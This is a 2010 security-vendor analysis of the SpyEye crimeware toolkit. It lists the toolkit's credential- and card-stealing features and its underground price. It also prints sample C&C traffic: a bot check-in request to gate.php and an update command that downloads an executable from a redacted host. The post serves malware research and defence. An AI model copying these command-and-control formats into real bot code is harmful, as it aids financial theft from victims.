SpyEye crimeware toolkit (May 28, 2010)

SonicWALL UTM Research team has been continuously monitoring newer variants of the SpyEye bots in the wild. In our detailed analysis of the SpyEye crimeware toolkit we found it to be very similar to Zeus in terms of functionality and features.

SpyEye is a web-based crimeware toolkit that was first released in early January, 2010 on underground forums. It is written in C++ and the size of the compiled bot was approximately 60KB in the first version. The newer version of SpyEye includes compression options which further reduces the size of the compiled binary to ~40KB. The main objective of this bot like Zeus is to steal financial information that includes banking credentials & credit card numbers as well as other sensitive information from victim machine.

SpyEye contains many interesting features which are listed below with the most notable being its ability to kill Zeus bot infection on the victim machine. This feature was not originally present but was added in version 1.0.7 onwards. This bot functions in ring3 mode like Zeus and runs hidden from the task manager, file explorer and other user-mode monitoring applications. Screenshot below shows SpyEye v1.0.7 toolkit in action:

SpyEye version 1.0.7 toolkit features:

• Formgrabber – Supports logging web form data for browsers like IE, Firefox, and Netscape.
• Credit Card AutoFill module – Automates the process of getting money from stolen credit cards.
• Steal FTP, POP3 & HTTP basic authorization accounts.
• Daily e-mail backup.
• Feature to kill Zeus bot infection.
• UPX compression & encrypted configuration file.
• Web-based control panel (PHP & MYSQL based).
• Ability to detect and clean SpyEye infection.

The build and configuration file generated by the tool kit can be seen here:

Screenshot of SpyEye web control panel main page:

Screenshot showing the status of various bots and tasks (posted by the author):

Network traffic generated by the BOT

• Bot sends following message containing system information to the C&C server upon successful infection from victim machine:

  GET /gate.php?guid=USERNAME!COMPUTERNAME!24B5EF92&ver=10120&stat=ONLINE&ie=7.0.5730.13&os=5.1.2600&ut=Admin&cpu=19&ccrc=2F9360E0&md5=b97f34389d7e16b2ff9868ae1130b628

• A sample of command received from the C&C server instructing the bot to update itself:

  UPDATE
  PATH=http://(REMOVED)/bin/ups.exe [Detected as GAV: SpyEye.AI (Trojan)]

The SpyEye toolkit is currently offered on underground forums for $500 with extra charges for newer features. The toolkit is continuously being updated with more sophisticated features and could be potential contender of surpassing Zeus and becoming king of crimware toolkits in future.

SonicWALL Gateway AntiVirus provides protection against SpyEye bot via GAV: SpyeEye.KD (Trojan), GAV: SpyEyes.DG_2 (Trojan) and GAV: Suspicious#spyeye (Trojan) signatures.

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.